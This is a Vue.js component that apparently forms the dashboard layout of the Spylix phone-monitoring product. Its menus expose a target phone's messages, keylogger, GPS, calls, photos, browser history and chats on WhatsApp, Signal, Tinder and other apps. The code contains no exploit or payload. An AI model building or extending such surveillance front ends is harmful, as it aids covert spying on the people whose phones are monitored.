<template>
  <div id="f3f5f7" style="overflow: hidden">
    <div class="header">
      <a @click="goSpy" class>
        <img src="@/assets/img/logosvg.svg" class="logo" />
      </a>
      <!-- <v-google-translate /> -->
      <languageTranslation></languageTranslation>

      <el-dropdown
        @visible-change="visibleChange"
        placement="top-start"
        trigger="click"
        @command="command"
      >
        <div class="user">
          <img src="@/assets/img/user_fff.png" />
          <i
            v-if="!isshowuser"
            :style="{ color: '#999', fontSize: '16px' }"
            class="el-icon-caret-bottom"
          ></i>
          <i
            v-else
            :style="{ color: '#999', fontSize: '16px' }"
            class="el-icon-caret-top"
          ></i>
        </div>
        <el-dropdown-menu slot="dropdown">
          <div class="users">
            <div class="user_tit">
              <img src="@/assets/img/u_avatar.png" />
              {{ email }}
            </div>
            <el-dropdown-item command="1">
              <div class="user_li">{{ $t("header.billing") }}</div>
            </el-dropdown-item>
            <el-dropdown-item command="2">
              <div class="user_li">{{ $t("device.title") }}</div>
            </el-dropdown-item>
            <el-dropdown-item command="3">
              <div class="user_li">{{ $t("header.settings") }}</div>
            </el-dropdown-item>
            <el-dropdown-item command="4">
              <!--  -->
              <div class="user_li">{{ $t("header.logOut") }}</div>
            </el-dropdown-item>
            <el-dropdown-item command="5">
              <!-- $router.push({ path: '/TermsOfUse' }) -->
              <div class="user_li">{{ $t("header.terms") }}</div>
            </el-dropdown-item>
            <el-dropdown-item command="6">
              <!-- $router.push({ path: '/TermsOfUse' }) -->
              <!-- @click="$router.push({ path: '/Privagypolicy' })" -->
              <div class="user_li">{{ $t("header.privacy") }}</div>
            </el-dropdown-item>
          </div>
        </el-dropdown-menu>
      </el-dropdown>
      <a href="https://my.spylix.com/signup">
        <div class="loginButton headerButton">{{ $t("Sign Up Free") }}</div>
      </a>
    </div>

    <div
      v-if="systemlist.length > 0"
      class="lefter scrollBar"
      :style="{ height: bodyHeight - 60 + 'px' }"
    >
      <!-- <div
        v-if="viptype !== 'Premium' && viptype !== 'Basic'"
        @click="$router.push({ path: '/ChoosCopy' })"
        class="loginButton lefterButton"
      >Purchase New Plan</div> -->
      <div
        v-if="viptype === 'Basic'"
        @click="$router.push({ path: '/ChoosCopy' })"
        class="loginButton lefterButton"
      >
        {{ $t("header.upgrade") }}
      </div>
      <div
        @click="DEVICELi == 5 ? (DEVICELi = 0) : (DEVICELi = 5)"
        class="left_ul"
      >
        {{ $t("header.device") }}
        <img v-if="DEVICELi == 5" src="@/assets/img/dow3.png" />
        <img v-if="DEVICELi != 5" src="@/assets/img/right.png" />
      </div>
      <div v-if="DEVICELi == 5">
        <div
          v-for="(val, key) in systemlist"
          :key="key"
          @click="reload(key, val.id, val.type, val.status, val.viptype)"
          :class="system == key ? 'system ok' : 'system'"
        >
          <div class="name">
            <i
              v-if="val.type == 1"
              class="u-iconfont uicon-android-fill system_logo"
            ></i>
            <i
              v-if="val.type == 2"
              class="u-iconfont uicon-apple-fill system_logo"
            ></i>
            <span>{{ val.name }}</span>
          </div>
          <!-- {{val.status==0?'未':'已'}} -->
          <img src="@/assets/img/dui.png" class="system_yes" />
        </div>
      </div>
      <a href="https://my.spylix.com/signup">
        <div class="system add">
          <img src="@/assets/img/jia.png" class="system_logo" />
          {{ $t("header.add") }}
          <img src="@/assets/img/dui.png" class="system_yes" />
        </div>
      </a>
      <router-link
        :to="{ name: 'index' }"
        @click.native="getname()"
        :class="name == 'index' ? 'left_a mr' : 'left_a'"
      >
        <img src="@/assets/img/home.png" />
        <img src="@/assets/img/home1.png" />
        {{ $t("header.dashboard") }}
      </router-link>
      <div
        class="left_ul"
        @click="GENERALLi == 1 ? (GENERALLi = 0) : (GENERALLi = 1)"
      >
        <div>{{ $t("header.general") }}</div>
        <img v-if="GENERALLi == 1" src="@/assets/img/dow3.png" />
        <img v-if="GENERALLi != 1" src="@/assets/img/right.png" />
      </div>
      <div v-if="GENERALLi == 1">
        <!-- v-show="systemName == 'Android'" -->
        <router-link
          v-if="isinmenu('header.text')"
          :to="{ name: 'Messages' }"
          @click.native="getname()"
          :class="name == 'Messages' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Messages.png" />
          <img src="@/assets/img/Messages1.png" />
          {{ $t("header.text") }}
        </router-link>
        <!-- v-show="systemName == 'iOS'" -->
        <router-link
          v-if="isinmenu('header.iMessages')"
          :to="{ name: 'iMessages', params: { key: 'iMessages' } }"
          @click.native="getname()"
          :class="name == 'iMessages' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/iMessages.png" />
          <img src="@/assets/img/iMessages1.png" />
          {{ $t("header.iMessages") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.gps')"
          :to="{ name: 'GPS' }"
          @click.native="getname()"
          :class="name == 'GPS' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/GPS.png" />
          <img src="@/assets/img/GPS1.png" />
          {{ $t("header.gps") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.keylogger')"
          :to="{ name: 'Keylogger' }"
          @click.native="getname()"
          :class="name == 'Keylogger' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Keylogger.png" />
          <img src="@/assets/img/Keylogger1.png" />
          {{ $t("header.keylogger") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.calls')"
          :to="{ name: 'Calls' }"
          @click.native="getname()"
          :class="name == 'Calls' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.calls") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.contacts')"
          :to="{ name: 'Contacts' }"
          @click.native="getname()"
          :class="name == 'Contacts' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Contacts.png" />
          <img src="@/assets/img/Contacts1.png" />
          {{ $t("header.contacts") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.events')"
          :to="{ name: 'Events' }"
          @click.native="getname()"
          :class="name == 'Events' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Events.png" />
          <img src="@/assets/img/Events1.png" />
          {{ $t("header.events") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.notes')"
          :to="{ name: 'Notes' }"
          @click.native="getname()"
          :class="name == 'Notes' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Notes.png" />
          <img src="@/assets/img/Notes1.png" />
          {{ $t("header.notes") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.photos')"
          :to="{ name: 'Photos' }"
          @click.native="getname()"
          :class="name == 'Photos' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Photos.png" />
          <img src="@/assets/img/Photos1.png" />
          {{ $t("header.photos") }}
        </router-link>
        <!-- <router-link to="screenRecording" @click.native="getname()" :class="name=='screenRecording'?'left_a mr':'left_a'">
        <img src="@/assets/img/Videos.png">
        <img src="@/assets/img/Videos1.png">
        screenRecording
        </router-link>-->
        <router-link
          v-if="isinmenu('header.videos')"
          :to="{ name: 'Videos' }"
          @click.native="getname()"
          :class="name == 'Videos' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Videos.png" />
          <img src="@/assets/img/Videos1.png" />
          {{ $t("header.videos") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.wifi')"
          :to="{ name: 'Text' }"
          @click.native="getname()"
          :class="name == 'Text' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Wi-Fi.png" />
          <img src="@/assets/img/Wi-Fi1.png" />
          {{ $t("header.wifi") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.keyword')"
          :to="{ name: 'Tracking' }"
          @click.native="getname()"
          :class="name == 'Tracking' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Keyword.png" />
          <img src="@/assets/img/Keyword1.png" />
          {{ $t("header.keyword") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.installed')"
          :to="{ name: 'Apps' }"
          @click.native="getname()"
          :class="name == 'Apps' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Installed.png" />
          <img src="@/assets/img/Installed1.png" />
          {{ $t("header.installed") }}
        </router-link>

        <router-link
          v-if="isinmenu('header.bookmarks')"
          :to="{ name: 'Browser' }"
          @click.native="getname()"
          :class="name == 'Browser' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Browser.png" />
          <img src="@/assets/img/Browser1.png" />
          {{ $t("header.bookmarks") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.browser')"
          :to="{ name: 'BrowserHistory' }"
          @click.native="getname()"
          :class="name == 'BrowserHistory' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/History.png" />
          <img src="@/assets/img/History1.png" />
          {{ $t("header.browser") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.email')"
          :to="{ name: 'Email' }"
          @click.native="getname()"
          :class="name == 'Email' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Email.png" />
          <img src="@/assets/img/Email1.png" />
          {{ $t("header.email") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.sim')"
          :to="{ name: 'SimCard' }"
          @click.native="getname()"
          :class="name == 'SimCard' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Sim.png" />
          <img src="@/assets/img/Sim1.png" />
          {{ $t("header.sim") }}
        </router-link>
      </div>
      <div
        class="left_ul"
        @click="SOCIALli == 2 ? (SOCIALli = 0) : (SOCIALli = 2)"
      >
        <div>{{ $t("header.network") }}</div>
        <img v-if="SOCIALli == 2" src="@/assets/img/dow3.png" />
        <img v-if="SOCIALli != 2" src="@/assets/img/right.png" />
      </div>
      <div v-if="SOCIALli == 2">
        <router-link
          v-if="isinmenu('header.whatsApp')"
          :to="{ name: 'WhatsApp', params: { pkg: 1, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'WhatsApp' && pkg == 1 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Whats_1@3x.png" />
          <img src="@/assets/img/Whats_2@3x.png" />
          {{ $t("header.whatsApp") }}
        </router-link>
        <router-link
          v-if="isinmenu('WhatsApp Business')"
          :to="{ name: 'WahtsAppBusiness', params: { pkg: 20, is3: 1 } }"
          @click.native="getname()"
          :class="
            name == 'WahtsAppBusiness' && pkg == 20 ? 'left_a mr' : 'left_a'
          "
        >
          <img src="@/assets/img/WechatIMG103.jpg" />
          <img src="@/assets/img/WechatIMG104.jpg" />

          {{ $t("WhatsApp Business") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.facebook')"
          :to="{ name: 'Facebook', params: { pkg: 11 } }"
          @click.native="getname()"
          :class="name == 'Facebook' && pkg == 11 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Facebook_1@3x.png" />
          <img src="@/assets/img/Facebook_2@3x.png" />
          {{ $t("header.facebook") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.facebookMessenger')"
          :to="{ name: 'Messenger', params: { pkg: 13 } }"
          @click.native="getname()"
          :class="name == 'Messenger' && pkg == 13 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Facebook_1@3x.png" />
          <img src="@/assets/img/Facebook_2@3x.png" />
          {{ $t("header.facebookMessenger") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.instagram')"
          :to="{ name: 'Instagram', params: { pkg: 10 } }"
          @click.native="getname()"
          :class="name == 'Instagram' && pkg == 10 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Instagram_1@3x.png" />
          <img src="@/assets/img/Instagram_2@3x.png" />
          {{ $t("header.instagram") }}
        </router-link>
        <router-link
          v-if="isinmenu('X')"
          :to="{ name: 'X', params: { pkg: 22, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'X' && pkg == 22 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/x1.png" />
          <img src="@/assets/img/x1.png" />

          {{ $t("X") }}
        </router-link>
        <router-link
          v-if="isinmenu('Tiktok')"
          :to="{ name: 'Tiktok', params: { pkg: 24, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Tiktok' && pkg == 24 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Tiktok.png" />
          <img src="@/assets/img/Tiktok.png" />
          {{ $t("Tiktok") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.snapchat')"
          :to="{ name: 'Snapchat', params: { pkg: 7 } }"
          @click.native="getname()"
          :class="name == 'Snapchat' && pkg == 7 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Snapchat_1@3x.png" />
          <img src="@/assets/img/Snapchat_2@3x.png" />
          {{ $t("header.snapchat") }}
        </router-link>
        <router-link
          v-if="isinmenu('LinkedIn')"
          :to="{ name: 'LinkedIn', params: { pkg: 30, is3: 0 } }"
          @click.native="getname()"
          :class="name == 'LinkedIn' && pkg == 30 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/LinkedIn.png" />
          <img src="@/assets/img/LinkedIn.png" />
          {{ $t("LinkedIn") }}
        </router-link>
        <router-link
          v-if="isinmenu('Zoom')"
          :to="{ name: 'Zoom', params: { pkg: 23, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Zoom' && pkg == 23 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Zoom.png" />
          <img src="@/assets/img/Zoom.png" />
          {{ $t("Zoom") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.kik')"
          :to="{ name: 'Kik', params: { pkg: 2 } }"
          @click.native="getname()"
          :class="name == 'Kik' && pkg == 2 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/kik_1@3x.png" />
          <img src="@/assets/img/kik_2@3x.png" />
          {{ $t("header.kik") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.viber')"
          :to="{ name: 'Viber', params: { pkg: 5, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Viber' && pkg == 5 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Viber_1@3x.png" />
          <img src="@/assets/img/Viber_2@3x.png" />
          {{ $t("header.viber") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.telegram')"
          :to="{ name: 'Telegram', params: { pkg: 4, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Telegram' && pkg == 4 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Telegram_1@3x.png" />
          <img src="@/assets/img/Telegram_2@3x.png" />
          {{ $t("header.telegram") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.line')"
          :to="{ name: 'Line', params: { pkg: 3, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Line' && pkg == 3 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/line_1@3x.png" />
          <img src="@/assets/img/line_2@3x.png" />
          {{ $t("header.line") }}
        </router-link>

        <router-link
          v-if="isinmenu('Signal')"
          :to="{ name: 'Signal', params: { pkg: 21, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Signal' && pkg == 21 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Signal.png" />
          <img src="@/assets/img/Signal.png" />

          {{ $t("Signal") }}
        </router-link>
        <router-link
          v-if="isinmenu('KakaoTalk')"
          :to="{ name: 'KakaoTalk', params: { pkg: 28, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'KakaoTalk' && pkg == 28 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/KakaoTalk.png" />
          <img src="@/assets/img/KakaoTalk.png" />
          {{ $t("KakaoTalk") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.skype')"
          :to="{ name: 'Skype', params: { pkg: 9, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Skype' && pkg == 9 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Skype_1@3x.png" />
          <img src="@/assets/img/Skype_2@3x.png" />
          {{ $t("header.skype") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.hangouts')"
          :to="{ name: 'Hangouts', params: { pkg: 8 } }"
          @click.native="getname()"
          :class="name == 'Hangouts' && pkg == 8 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Hangouts_1@3x.png" />
          <img src="@/assets/img/Hangouts_2@3x.png" />
          {{ $t("header.hangouts") }}
        </router-link>
        <router-link
          v-if="isinmenu('Reddit')"
          :to="{ name: 'Reddit', params: { pkg: 31 } }"
          @click.native="getname()"
          :class="name == 'Reddit' && pkg == 31 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Reddit.png" />
          <img src="@/assets/img/Reddit.png" />

          {{ $t("Reddit") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.tumblr')"
          :to="{ name: 'Tumblr', params: { pkg: 15 } }"
          @click.native="getname()"
          :class="name == 'Tumblr' && pkg == 15 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Tumblr_1@3x.png" />
          <img src="@/assets/img/Tumblr_2@3x.png" />
          {{ $t("header.tumblr") }}
        </router-link>
        <router-link
          v-if="isinmenu('Trillian')"
          :to="{ name: 'Trillian', params: { pkg: 25, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Trillian' && pkg == 25 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Trillian.png" />
          <img src="@/assets/img/Trillian.png" />

          {{ $t("Trillian") }}
        </router-link>

        <router-link
          v-if="isinmenu('IMO')"
          :to="{ name: 'IMO', params: { pkg: 27, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'IMO' && pkg == 27 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/IMO.png" />
          <img src="@/assets/img/IMO.png" />
          {{ $t("IMO") }}
        </router-link>
        <router-link
          v-if="isinmenu('Slack')"
          :to="{ name: 'Slack', params: { pkg: 26, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Slack' && pkg == 26 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Slack.png" />
          <img src="@/assets/img/Slack.png" />
          {{ $t("Slack") }}
        </router-link>
        <router-link
          v-if="isinmenu('Discord')"
          :to="{ name: 'Discord', params: { pkg: 29, is3: 1 } }"
          @click.native="getname()"
          :class="name == 'Discord' && pkg == 29 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Discord.png" />
          <img src="@/assets/img/Discord.png" />

          {{ $t("Discord") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.tinder')"
          :to="{ name: 'Tinder', params: { pkg: 6 } }"
          @click.native="getname()"
          :class="name == 'Tinder' && pkg == 6 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Tinder_1@3x.png" />
          <img src="@/assets/img/Tinder_2@3x.png" />
          {{ $t("header.tinder") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.badoo')"
          :to="{ name: 'Badoo', params: { pkg: 16 } }"
          @click.native="getname()"
          :class="name == 'Badoo' && pkg == 16 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/badoo_1@3x.png" />
          <img src="@/assets/img/badoo_2@3x.png" />
          {{ $t("header.badoo") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.pof')"
          :to="{ name: 'POF', params: { pkg: 19 } }"
          @click.native="getname()"
          :class="name == 'POF' && pkg == 19 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/pof_1@3x.png" />
          <img src="@/assets/img/pof_2@3x.png" />
          {{ $t("header.pof") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.wechat')"
          :to="{ name: 'Wechat', params: { pkg: 17 } }"
          @click.native="getname()"
          :class="name == 'Wechat' && pkg == 17 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/wechat_1@3x.png" />
          <img src="@/assets/img/wechat_2@3x.png" />
          {{ $t("header.wechat") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.qq')"
          :to="{ name: 'QQ', params: { pkg: 18 } }"
          @click.native="getname()"
          :class="name == 'QQ' && pkg == 18 ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/qq_1@3x.png" />
          <img src="@/assets/img/qq_2@3x.png" />
          {{ $t("header.qq") }}
        </router-link>
      </div>
      <div
        class="left_ul"
        v-if="isinmenu('header.recordings')"
        @click="SCREENli == 6 ? (SCREENli = 0) : (SCREENli = 6)"
      >
        <div>{{ $t("header.screen") }}</div>
        <img v-if="SCREENli == 6" src="@/assets/img/dow3.png" />
        <img v-if="SCREENli != 6" src="@/assets/img/right.png" />
      </div>
      <div v-if="SCREENli == 6 && isinmenu('header.recordings')">
        <router-link
          :to="{ name: 'screenRecording' }"
          @click.native="getname()"
          :class="name == 'screenRecording' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Videos.png" />
          <img src="@/assets/img/Videos1.png" />
          {{ $t("header.recordings") }}
        </router-link>
      </div>
      <!----v-if="isinmenu('Geo-Fencing Controls')||isinmenu('Website Control/ Blocking')||isinmenu('Wi-Fi Control/ Blocking')||isinmenu('Applications Control/Blocking')"-->
      <div
        class="left_ul"
        @click="CONTROLSli == 3 ? (CONTROLSli = 0) : (CONTROLSli = 3)"
      >
        <div>{{ $t("header.controls") }}</div>
        <img v-if="CONTROLSli == 3" src="@/assets/img/dow3.png" />
        <img v-if="CONTROLSli != 3" src="@/assets/img/right.png" />
      </div>
      <div v-if="CONTROLSli == 3">
        <router-link
          v-if="isinmenu('header.fencing')"
          :to="{ name: 'GeoFencing' }"
          @click.native="getname()"
          :class="name == 'GeoFencing' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Geo Fencing_1@3x.png" />
          <img src="@/assets/img/Geo Fencing_2@3x.png" />
          {{ $t("header.fencing") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.website')"
          :to="{ name: 'Website' }"
          @click.native="getname()"
          :class="name == 'Website' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Block Websites_1@3x.png" />
          <img src="@/assets/img/Block Websites_2@3x.png" />
          {{ $t("header.website") }}
        </router-link>
        <router-link
          v-if="isinmenu('header.wifiBlock')"
          :to="{ name: 'WiFi' }"
          @click.native="getname()"
          :class="name == 'WiFi' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Block WiFi_1@3x.png" />
          <img src="@/assets/img/Block WiFi_2@3x.png" />
          {{ $t("header.wifiBlock") }}
        </router-link>
        <router-link
          v-if="isinmenu('applications.title')"
          :to="{ name: 'Applications' }"
          @click.native="getname()"
          :class="name == 'Applications' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Block Applications_1@3x.png" />
          <img src="@/assets/img/Block Applications_2@3x.png" />
          {{ $t("applications.title") }}
        </router-link>
      </div>
      <div
        v-show="false"
        class="left_ul"
        @click="Otherli == 4 ? (Otherli = 0) : (Otherli = 4)"
      >
        {{ $t("header.other") }}
        <img v-if="Otherli == 4" src="@/assets/img/dow3.png" />
        <img v-if="Otherli != 4" src="@/assets/img/right.png" />
      </div>
      <div v-show="false" v-if="Otherli == 4">
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'CanYou' }"
          @click.native="getname()"
          :class="name == 'CanYou' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.canYou") }}
        </router-link>
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'YouWill' }"
          @click.native="getname()"
          :class="name == 'YouWill' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.youWill") }}
        </router-link>
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'Take' }"
          @click.native="getname()"
          :class="name == 'Take' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.take") }}
        </router-link>
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'And' }"
          @click.native="getname()"
          :class="name == 'And' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.done") }}
        </router-link>
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'SelectTheDevice' }"
          @click.native="getname()"
          :class="name == 'SelectTheDevice' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.selectTheDevice") }}
        </router-link>
        <router-link
          v-if="isinmenu('Contacts')"
          :to="{ name: 'ok' }"
          @click.native="getname()"
          :class="name == 'ok' ? 'left_a mr' : 'left_a'"
        >
          <img src="@/assets/img/Calls.png" />
          <img src="@/assets/img/Calls1.png" />
          {{ $t("header.ok") }}
        </router-link>
      </div>
    </div>
    <div
      class="contentShell"
      :style="{
        width: bodyWidth - 260 * 1 + 'px',
        height: bodyHeight - 60 + 'px',
      }"
    >
      <router-view v-if="isreload" />
    </div>
  </div>
</template>

<script>
import { getEquipmentList, Ability } from "@/api/user";
import languageTranslation from "./languageTranslation";
export default {
  components: {
    languageTranslation,
  },
  name: "HelloWorld",
  provide() {
    return {
      getheader: this.getgetEquipmentList,
    };
  },
  data() {
    return {
      menu: [],
      avatar: localStorage.getItem("avatar"),
      email: localStorage.getItem("email"),
      isshowuser: false,
      isreload: true,
      bodyHeight: document.body.clientHeight || window.innerHeight,
      bodyWidth: document.body.clientWidth || window.innerWidth,
      name: "",
      system: "",
      systemName: "",
      isyanzheng: 0,
      pkg: 0,
      // li: 5,
      DEVICELi: 5,
      GENERALLi: 1,
      SOCIALli: 5,
      SCREENli: 5,
      CONTROLSli: 5,
      Otherli: 5,
      msg: "",
      systemlist: [],
      viptype: null,
    };
  },
  watch: {
    $route(to, from) {
      // console.log(to, from)
      this.name = to.name;
      this.pkg = to.params.pkg;
      if (to.params.pkg > 0) {
        this.isreload = false;
        this.$nextTick(function() {
          this.isreload = true;
        });
      }
      if (this.name === "WhatsApp") {
        this.SOCIALli = 2;
      } else if (this.name === "GPS") {
        this.GENERALLi = 1;
      } else if (this.name === "Messages") {
        this.GENERALLi = 1;
      } else if (this.name === "Calls") {
        this.GENERALLi = 1;
      }
    },
  },
  mounted() {
    this.getgetEquipmentList();
    this.getname();
    this.viptype = localStorage.getItem("viptype");
    window.onresize = () => {
      this.bodyHeight = document.body.clientHeight || window.innerHeight;
      this.bodyWidth = document.body.clientWidth || window.innerWidth;
      // this.getnew()
    };
  },
  methods: {
    goSpy() {
      let href2 = {
        en: "https://www.spylix.com/",
        ar: "https://www.spylix.com/ar/",
        br: "https://www.spylix.com/br/",
        de: "https://www.spylix.com/de/",
        es: "https://www.spylix.com/es/",
        fr: "https://www.spylix.com/fr/",
        it: "https://www.spylix.com/it/",
        jp: "https://www.spylix.com/jp/",
        tr: "https://www.spylix.com/tr/",
      };
      window.open(href2[this.$i18n.locale]);
    },
    command(e) {
      switch (e) {
        case "1":
          break;
        case "2":
          break;
        case "3":
          break;
        case "4":
          // this.LogOut("");
          break;
        case "5":
          break;
        case "6":
          break;
        default:
          break;
      }
    },
    visibleChange(e) {
      this.isshowuser = e;
      this.email = localStorage.getItem("email");
    },
    reload(adj, a, b, c, d) {
      this.isyanzheng = c;
      this.system = adj;
      this.viptype = d;
      localStorage.setItem("viptype", d);
      localStorage.setItem("systemId", a);
      localStorage.setItem("system-status", c);
      localStorage.setItem(
        "system",
        b === ("Android" || "iOS") ? b : b === "1" ? "Android" : "iOS"
      );
      this.systemName = localStorage.getItem("system");
      if (c === 0) {
        this.$router.push({ name: "Guidance" });
      } else {
        this.$router.push({ name: "index" });
      }
      this.getnew();
      let type = this.systemlist[adj].type;
      Ability({ type }).then((adj) => {
        for (var poi = 0; poi < adj.data.length; poi++) {
          let key = this.$t(this.systemlist[this.system].viptype.split("-")[0]);
          let temp = adj.data[poi].name;

          if (key === temp) {
            this.menu = adj.data[poi].ability_list;
            if (c !== 0) {
              this.li = 1;
            }
          }
        }
      });
    },
    isinmenu(adj) {
      for (var ujn = 0; ujn < this.menu.length; ujn++) {
        let key = this.$t(adj);
        let temp = this.menu[ujn].name;
        if (adj === "header.wechat") {
          console.log(key, temp);
        }
        if (key == temp) {
          return this.menu[ujn].checked;
        }
      }
    },
    getnew() {
      this.isreload = false;
      this.$nextTick(function() {
        this.isreload = true;
      });
    },
    getname() {
      this.name = this.$route.name;
      this.pkg = this.$route.params.pkg;
      if (this.$route.params.pkg > 0) {
        this.isreload = false;
        this.$nextTick(function() {
          this.isreload = true;
        });
      }
    },
    LogOut() {
      localStorage.setItem("token", "");
      localStorage.setItem("systemId", undefined);
      localStorage.setItem("system", undefined);
      this.$router.push({ name: "login" });
    },
    getgetEquipmentList(type) {
      if (localStorage.getItem("token")) {
        getEquipmentList().then((adj) => {
          if (adj.data.length > 0) {
            this.systemlist = adj.data;
            let systemId = localStorage.getItem("systemId");
            let system = adj.data.findIndex((item) => {
              return item.id === Number(systemId);
            });
            console.log(systemId);
            if (type === "add") {
              let list = adj.data
                .filter((item) => item.bind_guidance === 0)
                .sort((a, b) => b.createtime - a.createtime);
              let temp = list[0];
              let index = adj.data.indexOf(temp);
              this.reload(
                index,
                adj.data[index].id,
                adj.data[index].type,
                adj.data[index].status,
                adj.data[index].viptype
              );
              return false;
            }
            if (!systemId || systemId === "undefined" || system === -1) {
              this.system = 0;
              this.reload(
                0,
                adj.data[0].id,
                adj.data[0].type,
                adj.data[0].status,
                adj.data[0].viptype
              );
            } else {
              this.system = system;
              this.reload(
                this.system,
                adj.data[this.system].id,
                adj.data[this.system].type,
                adj.data[this.system].status,
                adj.data[this.system].viptype
              );
            }
          } else {
            this.$router.push({ name: "system" });
          }
        });
      } else {
        this.$router.push({ name: "login" });
      }
    },
  },
};
</script>

